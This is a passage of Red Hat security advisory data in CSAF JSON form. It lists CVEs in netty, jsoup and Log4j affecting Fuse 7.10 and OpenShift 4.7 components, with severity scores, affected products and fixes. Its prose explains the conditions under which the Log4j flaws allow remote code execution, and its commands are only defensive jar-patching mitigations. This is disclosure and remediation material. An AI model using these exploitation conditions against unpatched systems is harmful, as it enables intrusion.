"https://nvd.nist.gov/vuln/detail/CVE-2021-37137", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37137" }, { "category": "external", "summary": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv", "url": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv" } ], "release_date": "2021-09-09T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "netty-codec: SnappyFrameDecoder doesn\u0027t restrict chunk length and may buffer skippable chunks in an unnecessary way" }, { "cve": "CVE-2021-37714", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-08-18T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1995259" } ], "notes": [ { "category": "description", "text": "jsoup is a Java library for working with HTML. Those using jsoup versions prior to 1.14.2 to parse untrusted HTML or XML may be vulnerable to DOS attacks. 
If the parser is run on user supplied input, an attacker may supply content that causes the parser to get stuck (loop indefinitely until cancelled), to complete more slowly than usual, or to throw an unexpected exception. This effect may support a denial of service attack. The issue is patched in version 1.14.2. There are a few available workarounds. Users may rate limit input parsing, limit the size of inputs based on system resources, and/or implement thread watchdogs to cap and timeout parse runtimes.", "title": "Vulnerability description" }, { "category": "summary", "text": "jsoup: Crafted input may cause the jsoup HTML and XML parser to get stuck", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-37714" }, { "category": "external", "summary": "RHBZ#1995259", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1995259" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-37714", "url": "https://www.cve.org/CVERecord?id=CVE-2021-37714" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-37714", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37714" }, { "category": "external", "summary": "https://github.com/jhy/jsoup/security/advisories/GHSA-m72m-mhq2-9p6c", "url": "https://github.com/jhy/jsoup/security/advisories/GHSA-m72m-mhq2-9p6c" } ], "release_date": "2021-08-18T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all 
applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "jsoup: Crafted input may cause the jsoup HTML and XML parser to get stuck" }, { "cve": "CVE-2021-44228", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "discovery_date": "2021-12-10T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2030932" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value", "title": "Vulnerability summary" }, { "category": "other", "text": "This issue only affects log4j versions between 2.0 and 2.14.1. 
In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" 
] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-44228" }, { "category": "external", "summary": "RHBZ#2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "external", "summary": "RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228", "url": "https://www.cve.org/CVERecord?id=CVE-2021-44228" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228" }, { "category": "external", "summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q", "url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q" }, { "category": "external", "summary": "https://logging.apache.org/log4j/2.x/security.html", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/", "url": "https://www.lunasec.io/docs/blog/log4j-zero-day/" }, { "category": "external", "summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" } ], "release_date": "2021-12-10T02:01:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" }, { "category": "workaround", "details": "For Log4j versions \u003e=2.10\nset the 
system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441", "product_ids": [ "Red Hat Fuse 7.10" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "exploit_status", "date": "2021-12-10T00:00:00+00:00", "details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "category": "impact", "details": "Critical" } ], "title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value" } ] }
rhsa-2021_5107
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Critical" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "Red Hat OpenShift Container Platform release 4.7.40 is now available with\nupdates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "Red Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n* log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender (CVE-2021-4104)\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. 
and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2021:5107", "url": "https://access.redhat.com/errata/RHSA-2021:5107" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#critical", "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "category": "external", "summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "external", "summary": "2031667", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2031667" }, { "category": "external", "summary": "2032580", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2032580" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5107.json" } ], "title": "Red Hat Security Advisory: OpenShift Container Platform 4.7.40 security update", "tracking": { "current_release_date": "2024-12-12T01:18:03+00:00", "generator": { "date": "2024-12-12T01:18:03+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.3" } }, "id": "RHSA-2021:5107", "initial_release_date": "2021-12-16T15:00:19+00:00", "revision_history": [ { "date": "2021-12-16T15:00:19+00:00", "number": "1", "summary": "Initial version" }, { "date": "2021-12-16T15:00:19+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-12-12T01:18:03+00:00", "number": 
"3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat OpenShift Container Platform 4.7", "product": { "name": "Red Hat OpenShift Container Platform 4.7", "product_id": "8Base-RHOSE-4.7", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift:4.7::el8" } } } ], "category": "product_family", "name": "Red Hat OpenShift Enterprise" }, { "branches": [ { "category": "product_version", "name": "openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64", "product": { "name": "openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64", "product_id": "openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64", "product_identification_helper": { "purl": "pkg:oci/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-hadoop\u0026tag=v4.7.0-202112150631.p0.g6046504.assembly.4.7.40" } } }, { "category": "product_version", "name": "openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64", "product": { "name": "openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64", "product_id": "openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64", "product_identification_helper": { "purl": "pkg:oci/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-hive\u0026tag=v4.7.0-202112140553.p0.g091bb99.assembly.stream" } } }, { "category": "product_version", "name": 
"openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64", "product": { "name": "openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64", "product_id": "openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64", "product_identification_helper": { "purl": "pkg:oci/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-ansible-operator\u0026tag=v4.7.0-202112150631.p0.g3959be4.assembly.4.7.40" } } }, { "category": "product_version", "name": "openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64", "product": { "name": "openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64", "product_id": "openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64", "product_identification_helper": { "purl": "pkg:oci/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-ansible-operator-bundle\u0026tag=v4.7.0.202112150631.p0.g3959be4.assembly.4.7.40-1" } } }, { "category": "product_version", "name": "openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64", "product": { "name": "openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64", "product_id": "openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64", "product_identification_helper": { "purl": 
"pkg:oci/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-presto\u0026tag=v4.7.0-202112150631.p0.gd502108.assembly.4.7.40" } } } ], "category": "architecture", "name": "amd64" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64 as a component of Red Hat OpenShift Container Platform 4.7", "product_id": "8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64" }, "product_reference": "openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64", "relates_to_product_reference": "8Base-RHOSE-4.7" }, { "category": "default_component_of", "full_product_name": { "name": "openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64 as a component of Red Hat OpenShift Container Platform 4.7", "product_id": "8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64" }, "product_reference": "openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64", "relates_to_product_reference": "8Base-RHOSE-4.7" }, { "category": "default_component_of", "full_product_name": { "name": "openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64 as a component of Red Hat OpenShift Container Platform 4.7", "product_id": "8Base-RHOSE-4.7:openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64" }, "product_reference": 
"openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64", "relates_to_product_reference": "8Base-RHOSE-4.7" }, { "category": "default_component_of", "full_product_name": { "name": "openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64 as a component of Red Hat OpenShift Container Platform 4.7", "product_id": "8Base-RHOSE-4.7:openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64" }, "product_reference": "openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64", "relates_to_product_reference": "8Base-RHOSE-4.7" }, { "category": "default_component_of", "full_product_name": { "name": "openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64 as a component of Red Hat OpenShift Container Platform 4.7", "product_id": "8Base-RHOSE-4.7:openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64" }, "product_reference": "openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64", "relates_to_product_reference": "8Base-RHOSE-4.7" } ] }, "vulnerabilities": [ { "cve": "CVE-2021-4104", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "discovery_date": "2021-12-13T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", 
"text": "2031667" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Java logging library Apache Log4j in version 1.x. JMSAppender in Log4j 1.x is vulnerable to deserialization of untrusted data. This allows a remote attacker to execute code on the server if the deployed application is configured to use JMSAppender and to the attacker\u0027s JNDI LDAP endpoint.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender", "title": "Vulnerability summary" }, { "category": "other", "text": "Based on the conditions to be exploitable (see details below), the risk is much lower than Log4j 2.x and Red Hat has assessed this to be Moderate severity. This flaw has been filed for Log4j 1.x, and the corresponding flaw information for Log4j 2.x is available at: https://access.redhat.com/security/cve/CVE-2021-44228\n\nNote this flaw ONLY affects applications which are specifically configured to use JMSAppender, which is not the default, or when the attacker has write access to the Log4j configuration for adding JMSAppender to the attacker\u0027s JNDI LDAP endpoint. \n\nIf the Log4j configuration is set TopicBindingName or TopicConnectionFactoryBindingName configurations allowing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228 Log4j 2.x, Log4j 1.x is vulnerable. However, the attack vector is reduced as it depends on having write access, which is not a standard configuration rather than untrusted user input. These are sufficient factors beyond the attacker\u0027s control.\n\nThe tomcat package shipped with Red Hat Enterprise Linux does not include log4j but it does include a default configuration for log4j, log4j.properties, which could be used with tomcat if users choose to install and configure the library. 
The JMSAppender is not enabled by default, and the permissions of the file can only be modified as root.\n\nRed Hat Virtualization ships log4j12-1.2.17, but it is used and configured in a way which makes this flaw not possible to exploit. Therefore impact is rated Low.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-RHOSE-4.7:openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64" ], "known_not_affected": [ "8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-4104" }, { "category": "external", "summary": "RHBZ#2031667", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2031667" }, { "category": "external", "summary": "RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-4104", "url": "https://www.cve.org/CVERecord?id=CVE-2021-4104" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-4104", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-4104" }, { "category": "external", 
"summary": "https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126", "url": "https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126" }, { "category": "external", "summary": "https://github.com/apache/logging-log4j2/pull/608#issuecomment-991723301", "url": "https://github.com/apache/logging-log4j2/pull/608#issuecomment-991723301" }, { "category": "external", "summary": "https://lists.apache.org/thread/0x4zvtq92yggdgvwfgsftqrj4xx5w0nx", "url": "https://lists.apache.org/thread/0x4zvtq92yggdgvwfgsftqrj4xx5w0nx" }, { "category": "external", "summary": "https://www.openwall.com/lists/oss-security/2021/12/13/1", "url": "https://www.openwall.com/lists/oss-security/2021/12/13/1" } ], "release_date": "2021-12-10T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-16T15:00:19+00:00", "details": "For OpenShift Container Platform 4.7 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.7/updating/updating-cluster-cli.html", "product_ids": [ "8Base-RHOSE-4.7:openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5107" }, { "category": "workaround", "details": "These are the possible mitigations for this flaw for releases version 1.x:\n\n- Comment out or remove JMSAppender in the Log4j configuration if it is used\n- Remove the JMSAppender class from the classpath. 
For example:\n```\nzip -q -d log4j-*.jar org/apache/log4j/net/JMSAppender.class\n```\n- Restrict access for the OS user on the platform running the application to prevent modifying the Log4j configuration by the attacker.", "product_ids": [ "8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64" ] } ], "threats": [ { "category": 
"impact", "details": "Moderate" } ], "title": "log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender" }, { "cve": "CVE-2021-44228", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "discovery_date": "2021-12-10T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2030932" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who 